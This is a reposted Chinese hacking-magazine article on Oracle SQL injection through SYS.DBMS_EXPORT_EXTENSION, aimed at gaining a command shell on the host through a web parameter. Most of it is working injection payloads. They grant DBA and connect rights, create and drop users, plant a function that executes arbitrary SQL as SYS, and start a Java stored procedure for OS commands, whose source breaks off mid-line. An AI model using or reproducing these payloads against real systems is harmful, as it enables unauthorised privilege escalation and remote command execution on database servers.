犀利的 oracle 注入技术

  发布时间:2009-06-09 11:12:29   作者:佚名   我要评论
犀利的 oracle 注入技术   原文发表在黑客手册   linx 2008.1.12   介绍一个在web上通过oracle注入直接取得主机cmdshell的方法。   以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION…..改成   /xxx.jsp?id=1 a

||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
  确定漏洞存在:
  1<>(
  select user_id from all_users where username='LINXSQL'
  )
  给linxsql连接权限:
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  GRANT CONNECT TO linxsql'''';END;'';END;–','SYS',0,'1',0) from dual
  删除帐号:
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  drop user LINXSQL'''';END;'';END;–','SYS',0,'1',0) from dual
  ======================
  以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
  1.jsp?id=1 and '1'<>(
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;–','SYS',0,'1',0) from dual
  ) and …
  1.jsp?id=1 and '1'<>(
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on Linx_query to public'''';END;'';END;–','SYS',0,'1',0) from dual
  ) and …
  1.jsp?id=1 and '1'<>(
  SELECT sys.Linx_Query('SELECT 14554 FROM DUAL') FROM DUAL
  ) and …
  1.jsp?id=1 and '1'<>(
  SELECT sys.Linx_Query('declare pragma
  autonomous_transaction; begin execute immediate ''
  select 1 from dual
  ''; commit; end;') from dual
  ) and …
  多语句:
  SELECT sys.Linx_Query('declare temp varchar2(200); begin select 1 into temp from dual; select 2 into temp from dual; end;') from dual
  创建用户(除非当前用户有system权限,否则无法成功):
  SELECT sys.Linx_Query('declare pragma
  autonomous_transaction; begin execute immediate ''
  CREATE USER Linx_Query_User IDENTIFIED BY Linx_Query_User
  ''; commit; end;') from dual
  ================
  以下的方法是先建立函数Linx_Query(),再建立 RunCMD2()
  1.创建函数
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  create or replace function Linx_Query (p
  varchar2) return number authid current_user is begin execute immediate
  p; return 1; end; '''';END;'';END;–','SYS',0,'1',0) from dual;
  如果有权限,以下语句应该允许正常
  select sys.linx_query('select 1 from dual') from dual;
  不然的话运行:
  select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  grant dba to 当前的User'''';END;'';END;–','SYS',0,'1',0) from dual
  2.创建包
  SELECT sys.Linx_Query('declare pragma
  autonomous_transaction; begin execute immediate ''
  create or replace and compile java source named "LinxUtil2" as import java.io.*;public class LinxUtil2 extends Object {public static String RunCMD(String args) throws IOException{BufferedReader myReader= new BufferedRe

相关文章

最新评论